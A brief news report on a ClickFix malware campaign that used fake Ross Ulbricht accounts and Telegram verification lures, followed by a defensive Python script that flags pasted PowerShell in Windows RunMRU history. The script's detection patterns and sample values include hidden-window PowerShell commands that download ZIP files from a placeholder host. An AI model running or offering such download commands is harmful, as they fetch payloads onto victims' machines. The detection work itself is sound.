Malware, Phishing

Malware deployed via new ClickFix attack variant using Silk Road founder as lure


Recent developments surrounding dark web market Silk Road founder and operator Ross Ulbricht, who was pardoned by President Donald Trump on Wednesday, have been leveraged by threat actors to launch a new ClickFix attack campaign that spread malware via Telegram CAPTCHAs, BleepingComputer reports.

Attackers created fraudulent but verified Ross Ulbricht accounts on X, formerly Twitter, to lure users into joining Telegram channels purporting to be Ulbricht portals. The channels walked users through a bogus "Safeguard" identity verification process that led to a Telegram mini app with a hoax verification dialog. The dialog deceives targets into pasting an automatically copied PowerShell command into the Windows Run dialog. Executing the PowerShell script prompts the download of a ZIP file with a suspected Cobalt Strike loader, which could be leveraged for ransomware and data exfiltration activities. The campaign follows a recent malvertising campaign, reported by Guardio Labs and Infoblox, that exploited CAPTCHA verification for PowerShell command execution.
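A defender-side check for the Run-dialog step described above, added here as an example and not taken from the BleepingComputer report or the campaign itself: Windows keeps Run-dialog history in the per-user RunMRU registry key, so exported values can be triaged for pasted PowerShell commands. The regex heuristics, the threshold, and the sample values are assumptions constructed for illustration.

```python
import base64
import re

# Win+R history is stored per user under this HKCU key; values end in "\1".
RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Generic heuristics chosen for this example, not indicators from the report.
INTERPRETER = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
HIDDEN = re.compile(r"(?<![\w-])-w\w*\s+(?:hid\w*|h|1)\b", re.I)
ENCODED = re.compile(r"(?<![\w-])-(?:e|ec|enc\w*)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD = re.compile(r"\b(?:iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod"
                      r"|downloadstring|downloadfile|start-bitstransfer)\b", re.I)
ZIP = re.compile(r"\.zip\b", re.I)

def decode_encoded(cmd):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or ''."""
    m = ENCODED.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or bad UTF-16 (both subclass ValueError)
        return ""

def triage(value):
    """Return the list of reasons one RunMRU value looks like a ClickFix paste."""
    cmd = value[:-2] if value.endswith("\\1") else value
    if not INTERPRETER.search(cmd):
        return []
    text = cmd + " " + decode_encoded(cmd)  # inspect the decoded payload as well
    checks = [("encoded command", ENCODED.search(cmd)),
              ("hidden window", HIDDEN.search(cmd)),
              ("network download", DOWNLOAD.search(text)),
              ("ZIP archive", ZIP.search(text))]
    return ["PowerShell via Run dialog"] + [name for name, hit in checks if hit]

def suspicious(values, threshold=3):
    """Keep values with at least `threshold` reasons (bare 'powershell' scores 1)."""
    return [(v, r) for v in values if len(r := triage(v)) >= threshold]

# Constructed sample RunMRU values (not taken from the campaign).
_B64 = base64.b64encode("irm https://example.invalid/a.zip".encode("utf-16-le")).decode()
SAMPLES = ["cmd\\1", "powershell\\1", "\\\\fileserver\\share\\1",
           'powershell -w hidden -c "iwr https://example.invalid/v.zip -OutFile v.zip"\\1',
           "powershell.exe -NoProfile -enc " + _B64 + "\\1"]

if __name__ == "__main__":
    for value, reasons in suspicious(SAMPLES):
        print(value[:60], "->", ", ".join(reasons))
```

RunMRU only records what was launched through the Run dialog for that user, so a hit is a lead to correlate with process-creation and network telemetry rather than proof of compromise.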
